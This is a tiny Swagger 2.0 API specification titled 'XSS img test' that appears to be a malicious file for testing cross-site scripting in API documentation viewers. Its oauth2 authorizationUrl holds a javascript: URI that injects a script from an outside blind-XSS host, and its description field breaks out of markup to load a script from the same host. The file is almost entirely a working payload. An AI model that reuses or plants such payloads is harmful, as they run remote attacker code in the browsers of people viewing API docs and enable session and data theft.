swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: "javascript:eval('var a=document.createElement('script');a.src='https://maniak.bxss.in';document.body.appendChild(a)')"
info:
  version: "1.0.0"
  title: XSS img test
  description: "><script src=https://maniak.bxss.in></script>"
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
